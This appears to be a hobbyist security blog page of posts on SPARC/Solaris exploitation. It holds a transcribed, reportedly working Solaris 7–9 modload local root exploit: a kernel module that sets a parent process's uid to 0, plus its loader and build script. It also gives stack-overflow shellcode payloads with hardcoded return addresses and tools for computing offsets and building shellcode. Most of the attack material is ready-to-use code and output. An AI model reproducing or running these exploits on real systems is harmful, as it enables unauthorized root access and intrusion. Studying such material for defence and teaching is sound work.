Bazz's Code Developments

NX-stack bypass w(1) Local Root Exploit Realization <3 - Pt. 19

Woo-Hoo. I’m finally ready to release source code :D

Read more ›

Posted in Asm, buffer overflow, C, NameFS, Sparc/Solaris

Solaris 7 8 9 modload user upload kernel module

“The Shellcoder’s Handbook” comes supplied with a ready exploit against http://www.securitytracker.com/id/1008833
But, it has some problems. the kernel module compiling script is broken (needs -c flag), else it will bitch about _init and _fini being defined twice.. This script uses the Sun Studio (11) cc compiler, but gcc can be used too (untested). https://www.thc.org/papers/slkm-1.0.html suggests

gcc -D_KERNEL -DSVR4 -DSOL2 -O2 -c flkm.c 
ld -o flkm -r flkm.o

To test this exploit (which I did successfully, yes this code works as is), I had to back down my patches on my Solaris box.. There is not automatic tool to uninstall patch dependencies.. So I built my own:

#include <stdio.h>
#include <strings.h>
#include <unistd.h>

char logtime_str[8192];
char mycmd[1024];
char deeplist[8192][25];
int curcount=0;

char *doit(char *cmd)
{
  FILE *fp;
  int status;
  char *str;
   
  /* Open the command for reading. */
  fp = popen(cmd, "r");
  if (fp == NULL) {
    printf("Failed to run command\n" );
    return NULL;
  }
 
  /* Read the output a line at a time - output it. */
  while (fgets(logtime_str, sizeof(logtime_str)-1, fp) != NULL) {
    //logtime_str[strlen(logtime_str)-1]=0; // take out \n
    printf("%s", logtime_str);
    if ( (str=strstr(logtime_str, "required to be installed by patch ")) )
    {
      strcpy(deeplist[curcount++], cmd);
      str+=strlen("required to be installed by patch ");
      str[9]=0;
      //sprintf ()
      return str;
    } 

  }
  return NULL;
  
}

int main(int argc, char **argv)
{
  if (argc != 2)
    exit(1);

  printf ("Removing Patch %s", argv[1]);
  sprintf(mycmd, "patchrm %s" , argv[1]); //108528-29");
  while (1)
  {
    char *newstr;
    if ( (newstr=doit(mycmd)) )
    {
      sprintf(mycmd, "patchrm %s", newstr);
      printf ("%s\n", mycmd);
      printf ("Removing Patch %s", mycmd);
    }
    else
    {
      if (curcount)
      {
        strcpy ( mycmd, deeplist[--curcount] );
        bzero (deeplist[curcount], 25);
      }
      else break;
    }
  }
  return 0;
}

in my case, I needed to uninstall 108528-29, and there were a lot of nested dependencies involved, ALL having to be uninstalled manually without this tool above.. So now I just do:

./a.out 108528-29

And BAM.. auto uninstall..

WARNING: Back-pedaling thru patches is dangerous!! My SSHD doesn’t work correctly now :[ So now I’m reinstalling the patch cluster x.x

Now, the source code to the exploit… Since this source code was not found anywhere, I had to transcribe it all myself…

o0o0.c

#include <stdio.h>
#include <sys/fstyp.h>
#include <sys/fsid.h>
#include <sys/systeminfo.h>

/* int sysfs(int opcode, const char *fsname); */

int main(int argc, char **argv)
{
  char modname[] = "../../../tmp/o0";
  char buf[4096];
  char ver[32], *ptr;
  int sixtyfour = 0;

  memset((char *) buf, 0x00, 4096);
  if (sysinfo(SI_ISALIST, (char *) buf, 4095) < 0)
  {
    perror("sysinfo");
    exit (0);
  }

  if (strstr(buf, "sparcv9"))
    sixtyfour = 1;

  memset( (char *) ver, 0x00, 32);
  if (sysinfo(SI_RELEASE, (char *) ver, 32) < 0)
  {
    perror("sysinfo");
    exit (0);
  }

  ptr = (char *) strstr(ver, ".");
  if (!ptr)
  {
    fprintf(stderr, "can't grab release version!\n");
    exit (0);
  }
  ptr++;

  printf ("%s\n",ptr);
  //return 0;

  memset((char *) buf, 0x00, 4096);
  if (sixtyfour)
    snprintf(buf, sizeof(buf)-1, "cp ./o064 /tmp/sparcv9/o0"/*, ptr*/);
  else
    snprintf(buf, sizeof(buf)-1, "cp ./o032 /tmp/o0"/*, ptr*/);

  if (sixtyfour)
  {
    if (mkdir("/tmp/sparcv9", 0755) < 0)
    {
      perror ("mkdir");
      exit(0);
    }
  }

  system(buf);
  sysfs(GETFSIND, modname);

  if (sixtyfour)
    system("/usr/bin/rm -rf /tmp/sparcv9");
  else
    system("/usr/bin/rm -f /tmp/o0");
}

moka.c

#include <sys/systm.h>
#include <sys/ddi.h>
#include <sys/sunddi.h>
#include <sys/cred.h>
#include <sys/types.h>
#include <sys/proc.h>
#include <sys/procfs.h>
#include <sys/kmem.h>
#include <sys/errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/modctl.h>

extern struct mod_ops mod_miscops;

int g3mm3(void);

int g3mm3()
{
  register proc_t *p;
  register proc_t *pp;
  cred_t *cr, *newcr;

  mutex_enter(&pidlock);
  for (p=practive; p!=NULL; p = p->p_next)
  {
    if (strstr(p->p_user.u_comm, (char *) "o0o0"))
    {
      pp = p->p_parent;
      newcr = crget();

      mutex_enter(&pp->p_crlock);
      cr = pp->p_cred;
      crcopy_to(cr,newcr);
      pp->p_cred = newcr;
      newcr->cr_uid = 0;
      mutex_exit(&pp->p_crlock);
    }
    continue;
  }
  mutex_exit(&pidlock);

  return 1;
}

static struct modlmisc modlmisc = 
{
  &mod_miscops,
  "u_comm"
};

static struct modlinkage modlinkage = 
{
  MODREV_1,
  (void *) &modlmisc,
  NULL
};

int _init(void)
{
  int i;

  if ((i = mod_install(&modlinkage)) != 0)
    //cmn_err(CE_NOTE, "");
    ;
#ifdef _DEBUG
  else
    cmn_err(CE_NOTE, "o0o0o0o0 installed o0o0o0o0");
  #endif

    i = g3mm3();
    return i;
}

int _info(struct modinfo *modinfop)
{
  return (mod_info(&modlinkage, modinfop));
}

int _fini(void)
{
  int i;

  if ((i = mod_remove(&modlinkage)) != 0)
    //cmn_err (CE_NOTE, "not removed");
    ;
#ifdef _DEBUG
  else
    cmn_err(CE_NOTE, "removed");
#endif

  return i;
}

make_64.sh

/opt/SUNWspro/bin/cc -xCC -g -xregs=no%appl,no%float -xarch=v9 -DUSE_KERNEL_UTILS -D_KERNEL -D_B64 -c moka.c
ld -o moka -r moka.o
rm moka.o
mv moka o064
gcc -o o0o0 o0o0.c
/usr/ccs/bin/strip o0o0 o064

Note: There were inconsistencies with the source code that I took care of.. Apparently the writers of the Shellcoder’s Handbook didn’t give 2 fucks about this one…

Posted in Sparc/Solaris

Protected: Memory Disclosure Pt. VIII

This content is password protected. To view it please enter your password below:

Posted in Asm, buffer overflow, C, Sparc/Solaris, Uncategorized

Protected: Smashing the Stack+Data sections PT. VII

This content is password protected. To view it please enter your password below:

Posted in Asm, buffer overflow, C, Sparc/Solaris, Uncategorized

Protected: Hacking Apply — Pt. VI

This content is password protected. To view it please enter your password below:

Posted in Asm, buffer overflow, C, Sparc/Solaris, Uncategorized

Protected: Hacking Apply – Pt. V

This content is password protected. To view it please enter your password below:

Posted in Asm, Bash, buffer overflow, C, Sparc/Solaris, Uncategorized

Protected: Pearl — Hacking Apply — pt. IV

This content is password protected. To view it please enter your password below:

Posted in Asm, buffer overflow, C, Sparc/Solaris, Uncategorized

Protected: Pearl — Hacking Apply Pt III

This content is password protected. To view it please enter your password below:

Posted in Bash, buffer overflow, C, Sparc/Solaris

Holy Mother of Pearl – Pt. II

Now let’s start perfecting our exploit:

STACK RANGE
0xFFBEE000
.
. 0xFFBEE800
.
. 0xFFBEF000
.
. 0xFFBEF800
.
0xFFBF0000

The above is the typical Stack range for a 32-bit sparc app in 64-bit kernel. That’s as specific as I care for.. We can create a guesser program to, based on nop-sled size, slice the bitspace into potential landing pads and call the vulnerable program for each landing pad until success.

Thus, this program will have the payload and be able to modify it as it goes.

given this line:

 ./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload3 338 >> payload; printf "\x41\x0a" >> payload

I have 338 bytes of nop slide goodness, 0x152. 8192 / 338 = 24.2 = 24. We can break the stack space into 24 chunks of potential zones where one of them will successfully execute the exploit. I’m assuming I have that many chances anyways..

Writing the automated Stack Shocker
Let me categorize our buffer:
[11111111111][fp][ra][2222222222222222222]
11111 and fp unchanged. ra is changed and 22222 is unchanged

I begin crafting my program.

-bash-4.3$ od -t x1 -A n payload
         01 41 41 41 01 42 42 42 01 43 43 43 01 44 44 44
         01 45 45 45 01 46 46 46 01 47 47 47 01 48 48 48
         01 49 49 49 01 4a 4a 4a 01 4b 4b 4b 01 4c 4c 4c
         01 4d 4d 4d 01 4e 4e 4e 01 4f 4f 4f 01 50 50 50
         01 51 51 51 01 52 52 52 01 53 53 53 01 54 54 54
         01 55 55 55 01 56 56 56 01 57 57 57 01 58 58 58
         01 59 59 59 01 5a 5a 5a 02 41 41 41 02 42 42 42
         02 43 43 43 02 44 44 44 02 45 45 45 02 46 46 46
         02 47 47 47 02 48 48 48 02 49 49 49 02 4a 4a 4a
         02 4b 4b 4b 02 4c 4c 4c 02 4d 4d 4d 02 4e 4e 4e
         02 4f 4f 4f 02 50 50 50 02 51 51 51 02 52 52 52
         02 53 53 53 02 54 54 54 02 55 55 55 02 56 56 56
         02 57 57 57 02 58 58 58 02 59 59 59 02 5a 5a 5a
         03 41 41 41 03 42 42 42 03 43 43 43 03 44 44 44
         03 45 45 45 03 46 46 46 03 47 47 47 03 48 48 48
         03 49 49 49 03 4a 4a 4a 03 4b 4b 4b 03 4c 4c 4c
         03 4d 4d 4d 03 4e 4e 4e 03 4f 4f 4f 03 50 50 50
         03 51 51 51 03 52 52 52 03 53 53 53 03 54 54 54
         03 55 55 55 03 56 56 56 03 57 57 57 03 58 58 58
         03 59 59 59 03 5a 5a 5a 04 41 41 41 04 42 42 42
         04 43 43 43 04 44 44 44 ff be fe 68 ff be fe 50
         11 0b d8 9a 90 12 21 6e d0 23 a0 54 11 0b dc da
         d0 23 a0 58 11 0b 5a 40 d0 23 a0 5c c0 23 a0 60
         90 03 a0 54 d0 23 a0 48 90 03 a0 5c d0 23 a0 4c
         c0 23 a0 50 90 03 a0 54 92 03 a0 48 94 1b 40 0d
         82 10 20 3b 91 d0 20 08 90 1b 40 0d 82 10 20 01
         91 d0 20 08 0a

-bash-4.3$ od -t x1 -A n payload | sed 's/      //g'
 01 41 41 41 01 42 42 42 01 43 43 43 01 44 44 44
 01 45 45 45 01 46 46 46 01 47 47 47 01 48 48 48
 01 49 49 49 01 4a 4a 4a 01 4b 4b 4b 01 4c 4c 4c
 01 4d 4d 4d 01 4e 4e 4e 01 4f 4f 4f 01 50 50 50
 01 51 51 51 01 52 52 52 01 53 53 53 01 54 54 54
 01 55 55 55 01 56 56 56 01 57 57 57 01 58 58 58
 01 59 59 59 01 5a 5a 5a 02 41 41 41 02 42 42 42
 02 43 43 43 02 44 44 44 02 45 45 45 02 46 46 46
 02 47 47 47 02 48 48 48 02 49 49 49 02 4a 4a 4a
 02 4b 4b 4b 02 4c 4c 4c 02 4d 4d 4d 02 4e 4e 4e
 02 4f 4f 4f 02 50 50 50 02 51 51 51 02 52 52 52
 02 53 53 53 02 54 54 54 02 55 55 55 02 56 56 56
 02 57 57 57 02 58 58 58 02 59 59 59 02 5a 5a 5a
 03 41 41 41 03 42 42 42 03 43 43 43 03 44 44 44
 03 45 45 45 03 46 46 46 03 47 47 47 03 48 48 48
 03 49 49 49 03 4a 4a 4a 03 4b 4b 4b 03 4c 4c 4c
 03 4d 4d 4d 03 4e 4e 4e 03 4f 4f 4f 03 50 50 50
 03 51 51 51 03 52 52 52 03 53 53 53 03 54 54 54
 03 55 55 55 03 56 56 56 03 57 57 57 03 58 58 58
 03 59 59 59 03 5a 5a 5a 04 41 41 41 04 42 42 42
 04 43 43 43 04 44 44 44 ff be fe 68 ff be fe 50
 11 0b d8 9a 90 12 21 6e d0 23 a0 54 11 0b dc da
 d0 23 a0 58 11 0b 5a 40 d0 23 a0 5c c0 23 a0 60
 90 03 a0 54 d0 23 a0 48 90 03 a0 5c d0 23 a0 4c
 c0 23 a0 50 90 03 a0 54 92 03 a0 48 94 1b 40 0d
 82 10 20 3b 91 d0 20 08 90 1b 40 0d 82 10 20 01
 91 d0 20 08 0a

-bash-4.3$ od -t x1 -A n payload | sed 's/      //g' | sed 's/ /\\x/g'
\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44
\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48
\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c
\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50
\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54
\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58
\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42
\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46
\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a
\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e
\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52
\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56
\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a
\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44
\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48
\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c
\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50
\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54
\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58
\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42
\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50
\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda
\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60
\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c
\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d
\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01
\x91\xd0\x20\x08\x0a

further continuing this:

-bash-4.3$ od -t x1 -A n payload | sed 's/      //g' | sed 's/ /\\x/g' | sed 's/^/"/g' | sed 's/$/"/g'
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44"
"\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48"
"\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c"
"\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50"
"\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54"
"\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58"
"\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42"
"\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46"
"\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a"
"\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e"
"\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52"
"\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56"
"\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a"
"\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44"
"\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48"
"\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c"
"\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50"
"\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54"
"\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58"
"\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42"
"\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50"
"\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda"
"\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60"
"\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c"
"\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x0a"
""
-bash-4.3$ od -t x1 -A n payload | sed 's/      //g' | sed 's/ /\\x/g' | sed 's/^/"/g' | sed 's/$/"/g' | sed 's/""//'
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44"
"\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48"
"\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c"
"\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50"
"\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54"
"\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58"
"\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42"
"\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46"
"\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a"
"\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e"
"\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52"
"\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56"
"\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a"
"\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44"
"\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48"
"\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c"
"\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50"
"\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54"
"\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58"
"\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42"
"\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50"
"\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda"
"\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60"
"\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c"
"\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x0a"

There is one problem. the payload.. it doesn’t have a nopsled..
each sparc instruction is 4 bytes and must be aligned properly.. word-aligned.
that means I really have 336 bytes to work with, 336/4 = 84 nop instructions.

i need a nop instruction:

# using the previous developed od2sc above.. 

bazz@life[pts/6][~/latest] printf ".globl main\nmain:\nxor %%g1,%%g1,%%g0\n" > /tmp/nop.S; buildsc /tmp/nop; od2sc /tmp/nop.bin
"\x80\x18\x40\x01"

Although this program doesn’t have to be made in C, I am now migrating it to C in anticipation of using it with a raw PTY in the remote exploit later on.. Actually. I just discovered that I can do the following:

bazz@life[pts/6][~/latest] (cat; cat payload cat)
dfd
dfd
AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDD���h���P
                                                                                                                ؚ�!n�#�T
                                                                                                                       ���#�X
                                                                                                                             Z@�#�\�#�`��T�#�H�� �� ��#�P��T��H�
dfd
dfd
bazz@life[pts/6][~/latest]

After interacting with cat.. I can CTRL-D (not ctrl-C), and then the other program will run.. That’s great.. maybe I can make this whole exploit in bash after all… BUT! That wouldn’t allow a raw terminal session experience in the remote shell. Things like signals or CTRL-characters would be interpreted by the local shell in a “cat” session. Thus, I’m going for the C solution. Plus I just tried using expect, holy God, catting a binary string is impossible <_< of course I only spent 5 minutes on it! I have tools I can do this in seconds on :) I am running out.. time to call it a night. But before I do: TO-DO
1) in PTY:
Allocate signals:
1) Sending payload
2) Respawning target process w/ new return address in payload
Add logic:
deallocate signals when the exploit is successful and we are in the shell.
2) Write the NOP-sled adjusting logic in bash. We can Cify it later

TO BE CONTINUED

Posted in Bash, buffer overflow, Sparc/Solaris

Holy Mother of Pearl — SPARC Exploitation Excerpts!

SO, back to exploiting the userland gets() function.

Vulnerable Test Prog

#include <stdio.h>
unsigned long get_sp( void ) {
        __asm__("or %sp,%sp,%r1");
// %r1 may have to be %i0 in some circumstances?? weirdness..
}

void copy( ){
        char buf[256];

        gets(buf);
}

int main( ) {
        unsigned long ret = get_sp();
        fprintf (stderr, "sp = 0x%x", ret);
        copy(  );
        return 0;
}
$ gcc -g v.c -o v

This invoke scripts helps me keep the stack offset the same whether I run the program in GDB or not..
Note: it doesn’t work that well on my Sun Blade 150 but it works well at the school server…
invoke script

#!/bin/bash

while getopts "dte:h?" opt ; do
  case "$opt" in
    h|\?)
      printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
      exit 0
      ;;
    t)
      tty=1
      gdb=1
      ;;
    d)
      gdb=1
      ;;
    e)
      env=$OPTARG
      ;;
  esac
done

shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
  if [ -n "$tty" ]; then
    touch /tmp/gdb-debug-pty
    exec env - $env TERM=screen PWD=$PWD /usr/local/gnu/bin/gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
  else
    exec env - $env TERM=screen PWD=$PWD /usr/local/gnu/bin/gdb --args $prog "$@"
  fi
else
  exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi

I use the invoke script with absolute paths. Here’s an example:

/home/bazz/tools/tmp/latest/invoke2 v < super_payload_lol
# or i want to use gdb:
/home/bazz/tools/tmp/latest/invoke2 -d v
# then from in gdb:
# r < super_payload

Interesting note on overflowing a buffer accepted through standard input. Is that the 0x0a byte has the same effect as a null byte. That was not documented anywhere >_< 0x0a is \n iirc, I wonder if \r byte has the same effect (0x0d).. I could try it out but I’m not…

Below is my buffer overflow “marker” program source code. This is documented at https://blogs.umb.edu/michaelbazzinott001/2014/09/25/alternating-payload-automated-offset-calculation-and-identification/
with the shell code assist program, it creates a block of specified length, outputs to stdout.
you are then required to concat any arbitrary data plus the null byte (or, apparently \n)

#include <stdio.h>
#include <stdlib.h>

// SPARC uses sys/inttypes.h
#ifdef __sun
  #include <sys/inttypes.h>
#else
  #include <stdint.h>
#endif

// this form provides buffer experimentation foundation
// buffer will be created up to numbytes desired, but < MAX, specified
// on the command line argument
// form: 0x[01-ff][41-5a][41-5a][41-5a]

// 0x41-0x5a range is chars 'A' to 'Z'
// An extended range < 'A' to > 'Z' could modify this program to extend
//the MAX length of the buffer

#define CHAR_RANGE (('Z'-'A')+1)  // 'Z' - 'A' is 25, but I know
// there are 26 letters in the alphabet. I call this inclusive subtraction,
// when I add 1 to get the real desired value. There is also inclusive
// addition I think. I'm using terms I created.
// little proof program to figure this out
/*

#include

// Conclusion: Inclusive Subtraction requires add 1

int main()
{
  printf("Derp Face, I'm ready :) \n");
  printf("'Z' - 'A' = %d", ('Z'-'A')+1);

  return 0;
}

*/

#define MAX (CHAR_RANGE * 255 * 4)
// Arbitrary MAX that is derived from the following formula:
// 26a * 255b * 4c
// a [letters of the alphabet]
// b [ byte field width excluding 0 (null byte)]
// c [ 4 bytes per entry ie. 0x01414141 ]

#define RANGE (26*4)

// does the following operation to get the offset:
// [(msb - 1) * 26] + (lsb - 0x41)
unsigned long getSmashOffset(const unsigned long *smashval)
{
  uint8_t msb,lsb;

  msb = ( *smashval >> 24 ) & 0xff;
  lsb = *smashval & 0xff;

  msb--;
  msb *= 26;
  lsb -= 0x41;

  return msb+lsb;
}

int main(int argc, char **argv)
{
  char a=0x41;
  char c=1;
  int i, rc=0;

  if (argc != 2)
  {
    printf ("You're doing it wrong! \n");
    printf ("Usage: %s [numbytes <= %d]|[smashed-stack-val]\n", argv[0], MAX);     exit (1);   }   unsigned long arg, numbytes,smashval;   arg = numbytes = strtoul( argv[1], (void *)0, 0 );   if (arg > MAX)
  {
    if (arg < 0x01414141)     {       printf ("You can't have an overflow amount > %d\n", MAX);
      exit(2);
    }
    else
    {
      printf ("%lu\n", getSmashOffset(&arg));
      return 0;
    }
  }
  int tag;
  for (a=0x40,i=0,c=1,tag=1; i < (numbytes); i++)
  {
    //    if (!rc)
    if (i%4 == 0)
    {
      tag = !tag;
          printf("%c", c);
      //if (tag == 1)
      //{
        a++;
        if (a == 'Z'+1)
          a = 0x41;
      //}
    }
    else
      printf("%c",a);
    //  else printf("%c%c%c%c", a,a,a,a);
    rc ++; //+= 4;
    if (rc == RANGE)
    {
      rc=0; c++;
      if (!c)
        c++;
    }
  }
  //printf("%c",'\0');
  return 0;
}

Check it out, here’s a stupid program that uses the write syscall to write some text “Hello” to stdout.

write_raw.S

bazz@blade72[pts/3][~/nobackup/fun] cat write_raw.S
.globl main
main:
! %o1 must point to the string! let's store the string on the stack
set 0x48656c6c, %o0     !"Hell"
st %o0, [%sp+84]
set 0x6f0a0000, %o0     ! "o\n"
st %o0, [%sp+88]
add %sp, 84, %o1

mov  1, %o0
mov  7, %o2
mov  4, %g1
ta  8

! addition to prevent illegal instruction failure
mov 1, %g1  ! move 1(exit() syscall) into %g1
mov 0, %o0    ! move 0(return address) into %o0
ta 8          ! call the kernel
bazz@blade72[pts/3][~/nobackup/fun] gcc write_raw.S -o /tmp/write_ex
bazz@blade72[pts/3][~/nobackup/fun] /tmp/write_ex
Hello
bazz@blade72[pts/3][~/nobackup/fun

This gets transformed to shellcode like this:

bazz@blade72[pts/3][~/nobackup/fun/asmshell] declare -f buildsc
buildsc ()
{
    if [ "$1" = "" ]; then
        echo 'buildsc filename no extension';
        return 1;
    fi;
    as $1.S -o $1.o;
    objcopy -O binary $1.o $1.bin
}

An alternative to objcopy, also sparcv9 how to:

bazz@vm72[pts/3][~/tools/tmp] cat asmtobin.sh
as -Av9 $1.S -o $1.o
ld $1.o -o $1.bin --oformat=binary
bazz@vm72[pts/3][~/tools/tmp]
bazz@blade72[pts/3][~/nobackup/fun] buildsc write_raw
bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw.
write_raw.S    write_raw.bin  write_raw.o
bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw.bin
000000 1112195b 9012206c d023a054 111bc280
000010 d023a058 9203a054 90102001 94102007
000020 82102004 91d02008 82102001 90102000
000030 91d02008
000034

Then, to correctly put out a buffer, this knowledge comes from experimenting and debugging the target binary..

bazz@blade72[pts/1][~/tools/tmp/latest] cat build_shellcode_steps
./alternating_payload3 328  # payload size to arrive at %fp and %i7
# fp which becomes the $sp I use during our infected run. These vals
# were obtained from live debugging and a better final adaptive method should be used
# at production level.
# orig val: ffbefe78
printf "\xff\xbe\xfd\x78"
# return address:
# original val: ffbefe78
printf "\xff\xbe\xfe\xf8"
#printf "\xff\xbe\xfe\x38" >> payload
# orig val: 0x40
# experimented displacing the payload farther "up" the stack
perl -e 'print "A"x0xc0'
cat $1 # payload bin file
printf "\x00"
bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps write_raw.bin > payload
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
